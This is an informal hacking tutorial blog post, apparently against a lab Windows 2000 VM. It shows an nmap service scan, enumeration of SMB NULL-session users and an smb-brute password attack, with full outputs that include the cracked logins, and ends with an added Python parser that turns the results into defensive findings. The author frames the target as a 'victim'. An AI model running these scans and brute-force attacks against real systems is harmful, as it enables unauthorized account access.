Wednesday, 18 Jan 2012
OK, let's get started. Bear in mind that I only use a target that is a victim, so whatever the risk, I'm not taking responsibility for it; I already took the risk yesterday, hahaha, so I'm just sharing it.

[0x01] scan and userenum

Here I will cover how to get access into the target machine; the target in question is of course a machine running on the Windows platform. Yup, as the title above says, the first step is to scan the target machine. Use nmap for the scanning. Why nmap and not something else? Because nmap is widely used and proven effective; if anyone wants to use another scanner, go ahead, nobody's stopping you.
kiddies@shellstr0m - nmap -sV 192.168.80.129
The result looks like this:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and
consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
1 service unrecognized despite returning data. If you know the service/version,
please submit the following
fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
SF:x\x01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds
From those scan results, a lot of open ports are listed, and we can see that the server also runs many applications, such as IIS, NetBIOS, SMB and others. As it happens, the server's OS is Windows 2000, so from here we can carry out several exploitation attempts against the server by knowing the ports listed in the scan results. Here we know, from the information available, that NetBIOS and SMB on Windows 2000 have the "NULL session" vuln, which lets us enumerate every account that exists.
How to do the userenum:
kiddies@shellstr0m - nmap --script=smb-enum-users 192.168.80.129
Result:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor,
SERVER\Guest, SERVER\IUSR_SERVER,
SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary,
SERVER\molly, SERVER\None, SERVER\TsInternetUser
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
From the results above we can tell all the users on the target system:
- Administrator
- backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser
For other techniques, go look them up yourself, OK. To brute-force with nmap, use this command:
kiddies@shellstr0m - nmap --script=smb-brute 192.168.80.129
The result:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
Done… meaning the scanning and getting the users is finished.
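As an added example that is not code from the original post, here is a small Python parser for nmap's normal-format output as it appears in the three runs above (the version scan, smb-enum-users and smb-brute). It pulls out the open ports, the accounts listed over the anonymous SMB session, and the logins smb-brute reported, then turns them into the findings a defender would want to act on: exposed SMB/NetBIOS and MS SQL, anonymously enumerable accounts, and why each guessed password was guessable (pukcab is backup reversed; password is a dictionary word). The sample text is constructed from the post's own output, abbreviated; the COMMON_PASSWORDS list, the finding wording and the function names are my own assumptions. Note that the raw smb-enum-users output also contains SERVER\None, which the post's hand-written list omits, so the parser reports 13 accounts.

```python
import re
from collections import namedtuple

# Constructed sample input: abbreviated copies of the three nmap runs shown in the post.
SCAN_OUTPUT = r"""Interesting ports on 192.168.80.129:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
MAC Address: 00:0C:29:CC:CF:46 (VMware)
"""
ENUM_OUTPUT = r"""Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor,
SERVER\Guest, SERVER\IUSR_SERVER,
SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary,
SERVER\molly, SERVER\None, SERVER\TsInternetUser
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
"""
BRUTE_OUTPUT = r"""Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_HEADER_RE = re.compile(r"^\|_?\s*([\w-]+):\s*$")
CRED_RE = re.compile(r"^([^:\s]+):(\S*)\s+=>\s+Login was successful")
COMMON_PASSWORDS = {"password", "123456", "admin", "letmein"}  # constructed stand-in for a banned-password list
# 'confirmed' is False when nmap printed a trailing '?' (service guessed, not verified)
Port = namedtuple("Port", "port proto state service version confirmed")

def parse_ports(text):
    """Rows of the 'PORT STATE SERVICE [VERSION]' table."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            num, proto, state, service, version = m.groups()
            ports.append(Port(int(num), proto, state, service.rstrip("?"),
                              version or "", not service.endswith("?")))
    return ports

def parse_script_results(text):
    """Map each NSE script in a 'Host script results' block to its body lines."""
    results, current = {}, None
    for line in text.splitlines():
        header = SCRIPT_HEADER_RE.match(line)
        if header:
            current = header.group(1)
            results[current] = []
        elif line.startswith("Nmap done") or not line.strip():
            current = None
        elif current:
            # wrapped lines may lack the '|' prefix, as in the post's copy of the output
            results[current].append(re.sub(r"^\|_?\s*", "", line).strip())
    return results

def enumerated_users(text):
    """Accounts listed by smb-enum-users, with the DOMAIN\\ prefix dropped."""
    body = " ".join(parse_script_results(text).get("smb-enum-users", []))
    return [e.strip().split("\\")[-1] for e in body.split(",") if e.strip()]

def guessed_credentials(text):
    """(user, password) pairs that smb-brute reported as successful logins."""
    matches = (CRED_RE.match(ln) for ln in parse_script_results(text).get("smb-brute", []))
    return [(m.group(1), m.group(2)) for m in matches if m]

def weak_password_reason(user, password):
    """Why a guessed password was guessable, or None if it passes these checks."""
    u, p = user.lower(), password.lower()
    if p == u[::-1]:
        return "username reversed"
    if p in COMMON_PASSWORDS:
        return "common dictionary word"
    return None

def assess(scan_text, enum_text, brute_text):
    """Turn the three outputs into the remediation findings a defender would act on."""
    ports = parse_ports(scan_text)
    users = enumerated_users(enum_text)
    creds = guessed_credentials(brute_text)
    services = {p.service for p in ports if p.state == "open"}
    findings = []
    if services & {"netbios-ssn", "microsoft-ds"}:
        findings.append("SMB/NetBIOS reachable: filter 139/445 at the network edge and "
                        "disable anonymous (NULL session) enumeration")
    if "ms-sql-s" in services:
        findings.append("MS SQL Server reachable: restrict 1433/tcp to application hosts")
    if users:
        findings.append(f"{len(users)} accounts enumerated over an anonymous SMB session")
    for user, pw in creds:
        findings.append(f"weak password for {user}: {weak_password_reason(user, pw)}")
    return {"ports": ports, "users": users, "credentials": creds, "findings": findings}

if __name__ == "__main__":
    for finding in assess(SCAN_OUTPUT, ENUM_OUTPUT, BRUTE_OUTPUT)["findings"]:
        print("-", finding)
```

Running the file prints five findings for the post's target: the SMB/NetBIOS and MS SQL exposure, the 13 anonymously enumerated accounts, and one line per guessed credential with the reason it was weak. The same functions accept real nmap output saved with -oN, since the parser only relies on the port-table row format and the "| script-name:" header convention.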